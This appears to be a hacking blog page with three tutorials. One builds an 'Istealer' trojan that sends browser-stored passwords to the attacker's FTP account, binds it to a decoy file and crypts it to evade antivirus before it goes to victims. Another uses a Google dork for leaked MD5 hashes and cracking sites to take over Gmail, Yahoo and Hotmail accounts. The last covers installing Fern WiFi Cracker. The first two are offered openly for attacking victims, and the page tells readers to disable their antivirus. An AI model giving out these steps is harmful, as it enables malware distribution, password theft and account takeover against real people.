Note :- Your anti virus will start screaming saying its a virus , But its not a virus ,So please turn off your AV(antivirus) software's before extracting the files   

2.  After extracting the files open Istealer.exe ,  Enter Host as "ftp.drivehq.com" without quotes ,Then enter your FTP accounts details (login name and password ) which you created earlier, check all options on the right hand side as shown

4. Now check "bind with another file " and select the file which you want to bind with the Istealer ,Then hit "change the icon " and change the icon as you wish, i have also include an  icon pack you can also use those icons. Finally select build and save the out put file 


Now we have successfully created our server file but it is detected by Av's as virus, so we have to Crypt our server file, so as to bypass antivirus detection , To do that follow the steps given below 

1. Download the Free FUD- Crypter software from the link given above , 


2. Open the crypter Software , Select server file as the Istealer file you created ( file created in step 4) ,finally click crypt
Now your istealer is totally  undetectable,
Now simply send this file to your victim, when the victim opens it  he will only see the file or app which you binded in step 4,
 Mean while your istealer will install silently in the background, After which  it will send  logs (containing stored passwords form the victims browser)  to your ftp account, You can view your victims passwords by logging  into your ftp account ,By this way we are able to successfully  hack our victims Email, Facebook ,Myspace Passwords 
 




SORRY LINKS ARE DOWN 

Hacking any Gmail,Yahoo,Hotmail emails using Google

To get success remeber this rule of hash technique TRY,Try and try :D


HELLO GUYS 
            today i will show u how to hack any gmail yahoo etc accounts very easily.
          I have seen the those people who want to hack someones email accounts spend their lots of time on searching but found nothing.Most of noob hackers try to hack someone with phishing attack.But today i am going to show you a very new method which is called hash technique.
So lets just begin 

1. open www.google.com
2. now paste this code in the search bar and hit enter

  ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e 

3. Now click on any of the displayed pages

   4, After clicking you will se these hashes along with the emails


5. copy any hash code Eg( 127359f404a2b735de9ba1336c66f480) and go to http://www.md5decrypter.co.uk/ paste the hash code and click descrypt hash  After 2-3 seconds it will
give u the password if found.
Some emails wont work they hve changed their passwords or the hash code result is null
I hope that u will enjoy this tutorial thanks and like us on facebook












 



If the above site dont work try these sites md5encryption.com
md5rainbow.com
md5online.org

Note 
       This is illegal and only for educational purpose

Fern wifi Cracker- A Wireless Penetration Testing Tool


 WiFi is now become the way for short distance Internet, for long distance we have WiMAX standard but WiFi is very important because you can find WiFi hot-spot everywhere like at the airport, coffee shop and at the educational places. There are so many people out there who are using WiFi at there home and at offices. Cracking a WiFi connection is a essential part of wardriving but for penetration tester and a ethical hacker WiFi or wireless network security is an important part. 

If you are doing a job as a IT security engineer and your task is to do a pen test on the wifi network. What tools are you going to use?

Operating system for this case is usually Linux or specially Ubuntu or backtrack, backtrack 5 contain different tools for WiFi cracking like aircrack-ng but in this article I will discuss something about Fern WiFi Cracker.

What Is Fern WiFi Cracker ?

Fern wifi cracker is a wireless security auditing application that is written in python and uses python-qt4. This application uses the aircrack-ng suite of tools. It can be run on any linux distribution like Fern wifi cracker is use in ubuntu or even you can use fern wifi cracker in windows but you must have some dependencies to run fern wifi cracker on windows.
Requirements of Fern wifi Cracker:
  • python
  • python-qt4
  • macchanger
  • aircrack-ng
  • xterm
  • subversion

Download Fern Wifi Cracker

 Fern wifi cracker can easily be install on ubuntu and backtrack, backbox,gnackbox and other distribution.

Fern wifi Cracker Tutorial

After downloading the file locate the directory and type. 

root@host:~# dpkg -i Fern-Wifi-Cracker_1.2_all.deb

Click the refresh button to display monitor interfaces:

Please Note, the scan button is a dual button, meaning, by clicking it the first time it scans for networks,then by clicking the button again, it stops any scan that was initialized (vise versa).

Fern wifi is a GUI and it can crack WEP and WPA as well.

please leave comments and like my facebook page if u like this tutorial it took lots of time to write this article

Comment

handapeunpost

English French German Spain Italian Dutch

Russian Portuguese Japanese Korean Arabic Chinese Simplified